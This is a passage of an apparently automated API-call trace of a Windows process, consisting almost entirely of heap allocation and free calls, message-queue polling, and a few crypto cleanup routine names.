RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0264.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0264.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0264.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0264.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0264.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0264.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0264.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0264.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0264.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0264.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0264.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0264.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0264.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0264.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0264.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0264.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0264.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0264.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0264.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0264.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0264.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0264.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0264.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520c0 [0264.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52078 [0264.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0264.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52078 | out: hHeap=0x970000) returned 1 [0264.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0264.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520c0 | out: hHeap=0x970000) returned 1 [0264.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52018 [0264.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f28 [0264.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52108 [0264.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0264.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52108 | out: hHeap=0x970000) returned 1 [0264.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0264.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f28 | out: hHeap=0x970000) returned 1 [0264.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0264.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0264.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0264.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0264.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0264.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0264.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0264.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0264.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0264.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0264.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0264.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0264.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0264.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0264.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0264.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0264.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0264.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0264.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0264.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0264.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14260 | out: hHeap=0x970000) returned 1 [0264.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14f50 [0264.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f148d8 | out: hHeap=0x970000) returned 1 [0264.944] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55128 [0264.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55148 [0264.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55188 [0264.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0264.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55118 [0264.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0264.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0264.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0264.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0264.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0264.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0264.945] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0264.945] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55238 [0264.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0264.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0264.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0264.945] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0264.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0264.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0264.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0264.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0264.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0264.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0264.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0264.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0264.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0264.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5c50) returned 0x2f2d178 [0264.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0264.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0264.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0264.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0264.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0264.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0264.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0264.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0264.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0264.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0264.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5c50) returned 0x2f32dd0 [0264.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2d178 | out: hHeap=0x970000) returned 1 [0264.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.946] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0264.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0264.946] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0264.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0264.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0264.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0264.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0264.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.946] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0264.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0264.947] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0264.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0264.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51970 [0264.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0264.947] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0264.947] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0264.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0264.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0264.947] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0264.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0264.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0264.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0264.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0264.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0264.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0264.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a90 [0264.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b08 [0264.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0264.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0264.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51988 [0264.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b98 [0264.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a60 [0264.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0264.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0264.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0264.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0264.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0264.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0264.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0264.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0264.960] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0264.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0264.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0264.960] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0264.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0264.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0264.960] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0264.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0264.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51988 [0264.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0264.960] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0264.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0264.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0264.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0264.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0264.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0264.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0264.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0264.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0264.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0264.961] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0264.961] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0264.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0264.961] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.961] 